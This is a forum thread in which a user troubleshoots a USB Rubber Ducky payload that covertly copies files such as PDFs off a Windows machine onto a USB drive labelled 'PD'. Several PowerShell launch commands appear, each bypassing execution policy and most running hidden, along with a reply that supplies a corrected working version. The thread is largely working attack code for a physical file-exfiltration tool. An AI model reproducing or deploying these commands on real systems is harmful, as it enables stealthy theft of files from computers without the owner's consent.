grahamjohnson77 Posted October 27, 2018 Share Posted October 27, 2018 All, I have started to learn the rubber ducky and followed the vblog on exfiltration of files from a system using the ducky. I built everything and all components are working except the initial drive find in PowerShell. Learning from vblog: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - Love these guys (shout out from Italy via Ireland!) For testing only (while I get more experience of the ducky), I have an external USB drive that I am using (e.g. F:\). That contains all the required files for d.bat. e.bat and the cscript i.vbs. Files are copied to slurp folder here. Then I plug in my rubber ducky to start the attack. That ducky script looks for the drive with Label "PD" (which is F:\) for the required d.bat to start the attack. Using my testing/debugging, I know that if I run the powershell cmd directly in a powershell CLI, the attack works no issues. Then, I can hard code the drive letter of F:\ and again, no issues. My slurp has the extracted pdf files. The only thing I can think it could be is the System is Locale Italian with Italian keyboard. But I am compiling it with ITALIAN encoder and works for other ways. REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "$u=gwmi win32_volume -Filter Label="`"PD"`";cd $u.Name;.\d.cmd" REM This one is working directly from Run -> Start!!! REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "F:\d.cmd" REM This one is working directly from Run -> Start!!! But Not Ducky! REM STRING powershell "$u=gwmi Win32_Volume|?{$_.Label -eq'PD'}|select name;cd $u.name;.\d.cmd" REM This one is working but I don't want to hard code it obviously! Just to try and confirm is working as expected! REM STRING powershell -NoP -NonI -W H -Exec Bypass "e:\d.cmd" REM My latest attempt! Still no luck! STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;" ENTER I did see some errors about the select from win32_volume not valid etc. last night during troubleshooting so i think i would be seeing some PowerShell error if the string format was incorrect etc. Any ideas of how to troubleshoot this line only from the Rubber Ducky payload when Ducky is running? (again, I can put it into PowerShell directly and works!) STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;" Thank you. Quote Link to comment Share on other sites More sharing options...
grahamjohnson77 Posted October 27, 2018 Author Share Posted October 27, 2018 BTW, all of the REMs are my attempts to try all different ways to get one to work. I have been online checking for suggestions too! Quote Link to comment Share on other sites More sharing options...
grahamjohnson77 Posted October 27, 2018 Author Share Posted October 27, 2018 This works directly from PS CLI: STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;" but not when run from ducky. Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 6, 2018 Share Posted November 6, 2018 (edited) Try this: powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;" You passed the name already. No need to reference it in the variable. Surprised it even works in your stand alone tests unless you are already in the folder with the d.cmd file. Also, to remove the extra (") that might be terminating the string you can use "{}" for the filter statement in powershell. Edited November 7, 2018 by PoSHMagiC0de Forgot the C parameter. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.